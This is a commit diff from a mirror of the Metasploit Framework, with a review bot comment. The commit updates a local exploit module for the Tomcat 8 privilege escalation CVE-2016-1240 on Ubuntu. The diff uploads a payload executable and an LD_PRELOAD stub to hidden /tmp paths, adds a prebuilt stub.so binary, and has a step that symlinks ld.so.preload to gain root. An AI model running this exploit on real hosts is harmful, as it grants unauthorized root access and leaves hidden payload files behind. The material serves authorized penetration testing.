mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
tomcat 8 priv esc on ubuntu prebuilt so file
parent
2b09af78e1
commit
34b1e66f90
BIN
data/exploits/CVE-2016-1240/stub.so
Normal file
BIN
data/exploits/CVE-2016-1240/stub.so
Normal file
Binary file not shown.
@ -133,18 +133,28 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
)
|
||||
print_good("Original #{catalina} backed up to #{path}")
|
||||
|
||||
# Upload payload executable
|
||||
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
|
||||
vprint_status("Uploading Payload to #{payload_path}")
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
register_file_for_cleanup(payload_path)
|
||||
|
||||
if live_compile?
|
||||
# upload our privesc stub
|
||||
so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
|
||||
so_stub_path = "#{base_dir}/#{so_stub}"
|
||||
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
|
||||
|
||||
# Upload exploit stub
|
||||
vprint_status "Compiling exploit stub: #{so_stub_path}"
|
||||
upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
|
||||
register_file_for_cleanup(so_stub_path)
|
||||
else
|
||||
payload_path = '/tmp/.jMeY5vToQl'
|
||||
so_stub = '.ny9NyKEPJ.so'
|
||||
so_stub_path = "/tmp/#{so_stub}"
|
||||
|
||||
write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
|
||||
end
|
||||
# Upload payload executable
|
||||
vprint_status("Uploading Payload to #{payload_path}")
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
# register_file_for_cleanup(payload_path)
|
||||
|
||||
# register_file_for_cleanup(so_stub_path)
|
||||
|
||||
# delete the log and symlink ld.so.preload
|
||||
vprint_status("Deleting #{catalina}")
|
||||
|
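Review bot: Both `register_file_for_cleanup` calls after the `if`/`else` are commented out, so as far as the visible lines show, the uploaded payload is never registered for removal in either branch, and the prebuilt stub written in the `else` branch is not either; a test run would leave both on the host. Restore `register_file_for_cleanup(payload_path)` after `upload_and_chmodx`, and add `register_file_for_cleanup(so_stub_path)` directly after the `write_file` call, since the live-compile branch already registers its own stub. The `else` branch also hard-codes `/tmp/.jMeY5vToQl` and `/tmp/.ny9NyKEPJ.so`, which ignores `base_dir` and reuses the same names in a world-writable directory on every run. Presumably those names are baked into `stub.so`; if so, say that in a comment such as `# paths are compiled into stub.so; must match the prebuilt binary`, and fail early when `base_dir` is not `/tmp`. The commit also adds `stub.so` as an opaque binary, so a short note recording how it was built from `privesc_preload.c` would let reviewers reproduce it; the enclosing method starts and ends outside the hunk.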